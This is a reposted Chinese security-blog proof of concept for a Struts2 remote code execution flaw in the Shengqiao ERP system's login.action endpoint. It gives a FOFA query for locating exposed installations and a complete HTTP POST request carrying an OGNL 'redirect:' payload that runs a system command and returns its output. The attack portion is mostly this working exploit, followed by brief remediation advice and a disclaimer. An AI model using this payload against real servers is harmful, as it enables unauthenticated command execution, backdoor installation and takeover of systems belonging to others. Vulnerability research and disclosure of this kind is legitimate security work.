圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC

admin 2024年12月17日13:23:34评论14 views字数 1515阅读5分3秒阅读模式
00

产品简介
圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件,旨在为企业提供一套全面、集成化的管理解决方案,帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块,实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业,特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中存在的信息孤岛、数据重复输入、信息传递滞后等问题,提高企业的整体竞争力。

01
漏洞概述

由于圣乔ERP系统使用Struts2开发框架组件,存在历史Struts2远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。

02
搜索引擎
FOFA:
title="圣乔ERP系统"
圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC
03
漏洞复现
POST /erp/login.action HTTP/1.1Host: Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Priority: u=0, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedredirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D
圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC
圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC
04
检测工具

nuclei

圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC

afrog

圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC

xray

圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoC
05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、对用户传入的参数进行限制。

3、通过防火墙等安全设备设置访问策略,设置白名单访问。

06

原文始发于微信公众号(nday POC):圣乔ERP系统 login.action Struts2远程代码执行漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月17日13:23:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   圣乔ERP系统 login.action Struts2远程代码执行漏洞 PoChttps://cn-sec.com/archives/3500436.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息